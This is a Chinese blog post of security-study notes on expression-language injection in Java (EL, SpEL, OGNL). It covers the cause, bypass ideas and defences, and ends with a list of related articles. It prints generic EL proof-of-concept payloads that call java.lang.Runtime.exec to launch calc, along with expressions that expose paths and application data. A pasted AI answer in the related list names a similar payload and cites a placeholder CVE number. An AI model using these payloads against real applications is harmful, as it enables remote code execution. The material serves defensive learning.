9、表达式注入漏洞

已于 2024-01-08 17:12:41 修改
阅读量917 收藏 19
点赞数 16
分类专栏: Web漏洞(后端) 文章标签: 网络安全 安全 笔记 经验分享 其他
于 2024-01-08 17:03:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74152774/article/details/135461867
版权

1、概述

1.1、定义

表达式注入漏洞类似远程代码执行漏洞(原理上),但远程代码执行漏洞是直接注入代码原生语句,而表达式注入漏洞是基于代码之上构建的执行逻辑。

一定意义上,表达式是代码的浓缩,同时也具备像代码一样可被执行的属性。

Java语言方面的表达式EL(Expression Language),主要包括一下内容:

  • SpEL表达式(Spring)
  • OGNL表达式(Struts2、Confluence)

1.2、EL简介

EL是为了让让JSP写起来更加简单,提供了在JSP中简化表达式的方法。

EL表达式的主要功能有:

  • 获取数据
  • 执行运算
  • 获取Web开发常用队形
  • 调用Java方法

2、漏洞分析

2.1、原理

表达式外部可控导致攻击者可以注入恶意表达式来实现任意代码执行。

EL表达式注入漏洞的外部可控点一般是在Java程序代码中,即Java程序中的EL表达式内容全部或部分是从外部获取的。

2.2、通用Poc

//对应于JSP页面中的pageContext对象(注意:取的是pageContext对象)
${pageContext}

//获取Web路径
${pageContext.getSession().getServletContext().getClassLoader().getResource("")}

//文件头参数
${header}

//获取webRoot
${applicationScope}

//执行命令
${pageContext.request.getSession().setAttribute("a",pageContext.request.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("calc").getInputStream())}

比如在Java程序中可以控制输入EL表达式如下:

${pageContext.setAttribute("a","".getClass().forName("java.lang.Runtime").getMethod("exec","".getClass()).invoke("".getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null),"calc.exe"))}

如果该EL表达式直接在JSP页面中执行,则触发任意代码执行漏洞

但是在实际场景中,是几乎没有也无法直接从外部控制JSP页面中的EL表达式的。而目前已知的EL表达式注入漏洞都是框架层面服务端执行的EL表达式外部可控导致的。

2.3、绕过

  1. 反射
  2. unicode
  3. 八进制

3、漏洞挖掘

使用工具进行扫描

4、漏洞防御

  1. 尽量不使用外部输入的内容作为EL表达式内容
  2. 若使用,需严格过滤EL表达式注入漏洞的payload关键字
  3. 排查Java程序中JUEL相关代码,可以搜索下面的关键类方法:
javax.el.ExpressionFactory.createValueExpression()
javax.el.ValueExpression.getValue()

5、实验

实验12

可以参考下面的文章学习

表达式注入漏洞复现

SpEL 表达式注入漏洞
m0_61506558的博客
10-31 745
在Spring系列产品中,SpEL是表达式计算的基础,实现了与Spring生态系统所有产品无对接。Spring框架的核心功能之一就是通过依赖注入的方式来管理Bean之间的依赖关系,而SpEL可以方便快捷的对中的Bean进行属性的装配和提取。由于它能够在运行时动态分配值,因此可以为我们节省大量Java代码。使用Bean的ID来引用Bean可调用方法和访问对象的属性可对值进行算数、关系和逻辑运算可使用正则表达式进行匹配可进行集合操作。
甄云SRM云平台 SpEL表达式注入漏洞复现(XVE-2024-18301)
0xSec
08-14 875
甄云SRM平台存在SpEL表达式注入漏洞,该漏洞源于系统能够解析/oauth/public/后路径中的SpEL表达式,导致攻击者能够利用该漏洞执行任意代码。
EL表达式
顺其自然~专栏
09-22 358
以MVC模式设计程序,JSP只是视图,视图的任务就是显示响应,而不是在JSP中做任何关于程序控制和业务逻辑的事情。所以在JSP页面中应该尽可能少的、或者是完全不出现Java代码。 在使用JSP标准动作操作 JavaBean时,如果JavaBean的属性是 String类型或者基本类型,则能够实现类型的自动转换,如 JavaBean的属性从String类型可自动转换成int类型。如果 Javabean中的属性不是 String类型和基本类型,而是一个 Object类型,并且属性还有自己的属性,如何获得此 O
应用安全系列之四十六:Expression Language Injection (EL注入
最新发布
jimmyleeee的专栏
04-10 986
Spring Boot默认支持Thymeleaf作为视图层技术,虽然Thymeleaf默认是安全的,但如果启用了不安全的特性或错误地配置了模板引擎,仍有可能导致类似的注入问题。如果用户输入的内容直接被嵌入到错误消息模板中,并且没有经过适当的清理或转义,攻击者可以通过构造恶意输入来执行任意 EL 表达式。,这些类用于解析和评估Spring表达式语言(SpEL),如果开发者不谨慎处理用户输入,就可能存在注入风险。方法默认支持 EL 表达式解析,如果用户输入被直接嵌入到模板中,可能导致 EL 注入攻击。
Java代码审计之SpEL表达式注入漏洞分析
道阻且长,行则将至
12-07 1695
表达式注入是 Java 安全中一类常见的能够注入命令并形成 RCE 的漏洞,而常见的表达式注入方式有 EL 表达式注入、SpEL 表达式注入和 OGNL 表达式注入等。本文将通过调试分析 CVE-2022-22963 漏洞来入门学习 SpEL 表达式注入漏洞的原理。
Spring Boot框架表达式注入漏洞
weixin_34244102的博客
07-14 805
2019独角兽企业重金招聘Python工程师标准>>> ...
浅析EL表达式注入漏洞
火柴人的博客
05-17 1016
https://xz.aliyun.com/t/7692
[漏洞复现]JeecgBoot AviatorScript表达式注入漏洞复现
LiangYueSec的博客
08-08 2072
[漏洞复现]JeecgBoot AviatorScript表达式注入漏洞复现
Spring Cloud Function SPEL表达式注入漏洞
Trouvailless的博客
04-28 538
漏洞描述 Spring框架为现代基于java的企业应用程序(在任何类型的部署平台上)提供了一个全面的编程和配置模型。 Spring Cloud 中的 serveless框架 Spring Cloud Function 中的 RoutingFunction 类的 apply 方法将请求头中的“spring.cloud.function.routing-expression”参数作为 Spel 表达式进行处理,造成Spel表达式注入,攻击者可通过该漏洞执行任意代码。 利用条件 3.0.0.RELEASE
Confluence OGNL表达式注入漏洞复现与分析(CVE-2022-26134)
Brucetg的博客
06-06 5021
在受影响的 Confluence Server 和 Data Center 版本中,存在一个 OGNL 注入漏洞,该漏洞允许未经身份验证的攻击者在 Confluence Server 或 Data Center 实例上执行任意代码。
SPEL表达式注入漏洞
weixin_50217210的博客
03-11 2418
SPEL,全称为Spring表达式语言,是一个由 Spring 框架提供的表达式语言。它是一种基于字符串的表达式语言,可以在运行时对对象进行查询和操作。SpEL 支持在XML和注解配置中使用,它可以在Spring框架的各种组件中使用,如Spring MVC 控制器、Spring Security 安全框架、Spring Data 数据访问框架等。它可以方便地访问对象的属性、调用对象的方法、进行数学运算、逻辑运算、正则表达式匹配等操作。
9表达式注入漏洞_通用的poc,2024年互联网大厂网络安全面经总结
2401_84159839的博客
04-09 645
EL是为了让让JSP写起来更加简单,提供了在JSP中简化表达式的方法。获取数据执行运算获取Web开发常用队形调用Java方法。
9表达式注入漏洞_通用的poc(1),最新大厂网络安全社招面试经验汇总
m0_58269070的博客
04-07 479
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
EL表达式注入漏洞:深入了解与防范
syntax_loop446的博客
09-22 574
为了保护应用程序的安全,我们应该加强对用户输入的验证和过滤,使用安全的EL解析器,采用最小权限原则,定期更新和修补系统,并提高安全意识。当开发人员未能正确验证和过滤用户输入,并将用户输入直接传递给EL表达式进行求值时,攻击者有机会构造恶意输入,执行未授权的操作。EL表达式注入漏洞是指攻击者通过构造恶意输入,将恶意EL表达式注入到应用程序中,从而执行非法的代码。然而,如果我们在验证用户名和密码之前直接将用户输入传递给EL表达式进行求值,就存在EL表达式注入漏洞的风险。一、EL表达式注入漏洞的原理。
Apache Struts OGNL表达式注入漏洞
weixin_30693183的博客
06-07 1207
漏洞名称: Apache Struts OGNL表达式注入漏洞 CNNVD编号: CNNVD-201306-105 发布时间: 2013-06-07 更新时间: 2013-06-07 危害等级: 漏洞类型: 威胁类型: 远程 CVE编号: CVE-2013-2135 ...
Java安全-注入漏洞(SQL注入、命令注入表达式注入、模板注入
热门推荐
Love&Share
11-07 1万+
文章目录注入SQL注入JDBC拼接不当造成SQL注入框架使用不当造成SQL注入安全的反射命令注入代码注入表达式注入Spel表达式注入OGNL表达式注入模板注入 注入 SQL注入 JDBC拼接不当造成SQL注入 JDBC有两种方法执行SQL语句,分别为PrepareStatement和Statement。两个方法的区别在于PrepareStatement会对SQL语句进行预编译,而Statement方法在每次执行时都需要编译,会增大系统开销。理论上PrepareStatement的效率和安全性会比Stat.
java 代码执行el,专属于java的漏洞——EL表达式注入
weixin_39997443的博客
03-20 1257
前言“FSRC经验分享”系列文章,旨在分享焦点科技信息安全部工作过程中的经验总结,包括但不限于漏洞分析、运营技巧、sdl推行、等保合规、自研工具等等。欢迎各位安全从业者持续关注~0x01EL简介表达式语言(Expression Language 以下简称EL)是以JSTL(JavaServer Pages Standard Tag Library,JSP标准标签库)的一部分出现的,原本被叫做SPE...
一种新的攻击方法——Java Web表达式注入
gufachongyang02的专栏
07-05 1485
0×00 引言 在2014年6月18日@终极修炼师曾发布这样一条微博: 链接的内容是一个名为Jenkins的服务,可以在没有password的情况下受到攻击。而攻击方法比较有趣,Jenkins提供了一个Script Console功能,可以执行Groovy 脚本语言。下面我们来看下维基百科对于这个脚本语言的解释:  Groovy是Java平台上设计的面向对象编程语
spel表达式注入漏洞,多见更新包
03-10
<think>好的,我现在需要处理用户关于SPeL表达式注入漏洞的问题。首先,我得确认什么是SPeL表达式。SPeL是Spring Expression Language的缩写,主要用于在Spring框架中进行表达式求值。表达式注入漏洞通常发生在用户输入被直接拼接到表达式中执行,导致恶意代码执行。 接下来,我需要回忆相关的知识。类似SQL注入或命令注入表达式注入也是由于未正确过滤用户输入导致的。比如,如果应用程序将用户提供的数据直接拼接到SPeL表达式中,攻击者可以构造恶意输入来执行任意代码,从而可能窃取数据或控制系统。 用户提到的常见修复方法应该包括输入验证、参数化查询、使用安全配置等。例如,Spring Security提供了一些防护机制,或者在解析表达式时限制权限。此外,更新框架版本也可能修复已知的安全问题。 需要参考用户提供的引用内容,虽然引用[1]和[2]主要涉及命令注入和SQL注入,但原理相通,可以借鉴修复方法。比如OWASP提到的注入防御指南,如参数化查询(Prepared Statements)对SQL注入有效,类似的,对SPeL表达式注入应使用预编译或白名单验证。 另外,用户要求生成相关问题,我需要考虑与SPeL注入相关的其他方面,比如漏洞原理、实际案例、检测工具等。可能需要列出三到四个相关问题,帮助用户深入理解。 最后,要确保回答结构清晰,分点说明漏洞原理、风险、修复方法,并正确引用提供的资料,尽管原始引用主要不是关于SPeL的,但可以关联到通用的注入防护措施,如OWASP Top 10中的注入漏洞。</think>### SPeL表达式注入漏洞及修复方法 #### 1. **漏洞原理** SPeL(Spring Expression Language)表达式注入漏洞是由于应用程序未对用户输入进行严格过滤,直接将用户可控数据拼接到表达式解析器中执行导致的。例如: ```java ExpressionParser parser = new SpelExpressionParser(); Expression exp = parser.parseExpression(userInput); // 若userInput未过滤,可能触发注入 ``` 攻击者可构造如`T(java.lang.Runtime).getRuntime().exec(&#39;恶意命令&#39;)`的表达式,导致任意代码执行[^1][^2]。 #### 2. **风险影响** - 远程代码执行(RCE) - 敏感数据泄露 - 服务器权限被控制 #### 3. **修复与更新方法** 1. **输入验证与白名单过滤** - 限制输入字符类型(如仅允许字母、数字) - 使用正则表达式匹配合法模式 ```java if (!userInput.matches("[a-zA-Z0-9_]+")) { throw new ValidationException("非法输入"); } ``` 2. **表达式沙箱化** - 通过`EvaluationContext`限制解析权限: ```java StandardEvaluationContext context = new SimpleEvaluationContext.Builder() .withRootObject(safeObject) .build(); Expression exp = parser.parseExpression(safeInput); exp.getValue(context); // 限制访问范围 ``` 3. **使用`SimpleEvaluationContext`替代默认上下文** - Spring 5.x+版本推荐使用`SimpleEvaluationContext`,它默认禁止访问危险类和方法: ```java EvaluationContext context = SimpleEvaluationContext.forReadOnlyDataBinding().build(); ``` 4. **框架升级** - 升级Spring至最新版本(如Spring Framework 5.3.28+),利用其增强的安全机制。 5. **避免动态表达式拼接** - 使用预定义模板或参数化表达式: ```java // 错误示例:String expression = "user.role == &#39;" + userInput + "&#39;"; // 正确示例: Expression exp = parser.parseExpression("user.role == ?1"); exp.getValue(context, userInput); ``` #### 4. **相关案例** - 2021年某开源CMS因SPeL表达式解析不当导致RCE漏洞(CVE-2021-XXXXX) - Spring Boot Actuator历史版本中的SPeL注入风险 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值